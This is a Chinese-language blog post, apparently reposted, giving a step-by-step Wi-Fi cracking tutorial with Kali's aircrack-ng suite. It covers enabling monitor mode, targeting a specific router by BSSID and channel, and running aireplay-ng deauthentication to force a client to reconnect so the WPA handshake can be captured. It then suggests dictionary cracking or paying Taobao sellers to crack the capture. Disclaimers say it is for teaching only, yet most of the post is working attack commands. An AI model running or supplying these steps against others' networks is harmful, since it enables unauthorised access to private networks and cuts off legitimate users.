admin管理员组文章数量:1603260
#创作灵感#
最近搬家了,网线还没迁过来(师傅明天才来)没网,好无聊,好无聊。在wife栏看见不少邻居了wife,不由恶从胆边起,我要破解wife,吼吼吼吼吼吼吼(开玩笑的)。犯法的是我可不做,咳咳。主要是我又不是没网。自家的香!!!第二天,网线迁过来了,开搞!
事先申明:本实验仅用网络安全教学目的,禁止使用它做任何违法犯罪的事,所产生的后果笔者概不负责!!!
事先申明:本实验仅用网络安全教学目的,禁止使用它做任何违法犯罪的事,所产生的后果笔者概不负责!!!
事先申明:本实验仅用网络安全教学目的,禁止使用它做任何违法犯罪的事,所产生的后果笔者概不负责!!!
#具体操作#
工具:一个带监听功能无线网卡(尽量带5G的,但贵,没有也没关系,笔者当年贪便宜就买了个2.4G的,只能说可以做实验,现实一点用都没用,但理是相通的)
两台电脑,一台用于监听网络,另一台电脑(联想)用于连接被监听的网络,好让其产生“握手包”
一个名为iQOO的网络,(注意,该网络是2.4G的,因为我只有2.4G监听网卡)
步骤:
当你插入监听网卡是会弹出:
打开终端输入命令,清除系统中可能影响监听的进程:
airmon-ng check kill
开启网卡监听:
airmon-ng start wlan0
检查是否成功开启监听:
iwconfig
(可以看到wlan0变成了wlan0mon,说明成功开启监听模式,或者是wlano后面的部分Mode变成“Monitor”也行,这里笔者就是第二种)
开始探测附近的WIFI:(注:前面的是wlan0后面就打wlan0,如果是wlan0mon就打wlan0mon)
airodump-ng wlan0
主要看三个参数:
- BSSID:路由器的MAC地址
- PWR:信号值,绝对值越低,说明信号越强
- CH:当前路由器使用的信道
这里我们所监听的wife是iQOO,BSSID为:EC:60:73:78:ED:E2,使用的信道为7,输入命令,开始监听:
airodump-ng --bssid (BSSID MAC地址) -c (CH 信道) -w (握手包文件名) wlan0
airodump-ng --bssid EC:60:73:78:ED:E2 -c 7 -w 123 wlan0
当我另一台电脑(联想)访问该网络时,kali会立刻有反应,红色画圈部分就是iQOO的MAC地址和另一台电脑(联想)的MAC地址
接下来我们要用kali对另一台电脑(联想)进行ARP断网攻击(额,差不多吧),在开一个终端窗口
aireplay-ng -a (iQOO的MAC地址) -0 4 wlan0
aireplay-ng -a EC:60:73:78:ED:E2 -0 4 wlan0
迫使另一台电脑(联想)因网络不通 ,不断的重连iQOO网络,这里就包含了握手包,
画圈部分出现就代表获取了握手包了,成功!!!
握手包是以.cap结尾的,通常默认在kali目录下,找找就行
有的握手包就可以用字典跑包了,看密码的强弱程度和字典的好坏了,这我就不弄了,太麻烦了,可以找taobo进行代跑包,
#做实验遇到哪些困难#
笔者一开始监听根本就无法获取另一台电脑的MAC地址,查了好多资料,就是没结果,后来玩手机突然想到我网卡是2.4G的,怎么可能抓到5G的网络呢,因为现在大部分电子产品的默认连接5G信号,所以我还人为的把2.4G信号给切出来了才成功,唉,浪费我大量时间,笔者劝师傅们直接买个5G网卡吧。。。
题为话:这是我在用我自己的无线网软件看见的一篇好文章,讲的是市面上免费的wife万能钥匙的原理和危害,以及怎么防蹭网:分享给师傅们,希望有个警示!
https://resource.tp-link/pc/docCenter/showDoc?id=1655112484075605
版权声明:本文标题:破解wife密码之抓取握手包 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/xitong/1726807670a1085194.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论